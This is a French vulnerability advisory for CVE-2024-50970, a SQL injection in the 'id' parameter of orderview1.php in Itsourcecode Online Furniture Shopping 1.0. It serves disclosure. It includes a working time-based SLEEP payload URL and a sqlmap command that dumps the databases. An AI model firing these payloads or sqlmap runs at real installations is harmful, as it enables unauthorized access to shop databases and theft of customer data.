CVE-2024-50970
Description
Une vulnérabilité d'injection SQL dans orderview1.php du projet Itsourcecode Online Furniture Shopping 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre id.
Type de vulnérabilité
Injection SQL
Éditeur du produit
Itsourcecode
Base de code du produit affecté :
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
Composant affecté :
Le projet Itsourcecode Online Furniture Shopping v1.0 est vulnérable à l'injection SQL via le paramètre id dans la page orderview1.php
Vecteurs d'attaque :
- Installez l'application localement, créez un compte et connectez-vous avec le compte nouvellement enregistré.
- Accédez à l'URL suivante dans votre navigateur :
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- Injectez une charge utile SQL :
Modifiez le paramètre id dans l'URL pour inclure une charge utile d'injection SQL basée sur le temps.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- Observez la réponse de l'application :
La page devrait prendre nettement plus de temps (10 secondes) à charger si l'injection réussit, confirmant que le paramètre id est vulnérable à l'injection SQL.
- Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et l'extraction des bases de données à l'aide de la commande ci-dessous :
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
Références :
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection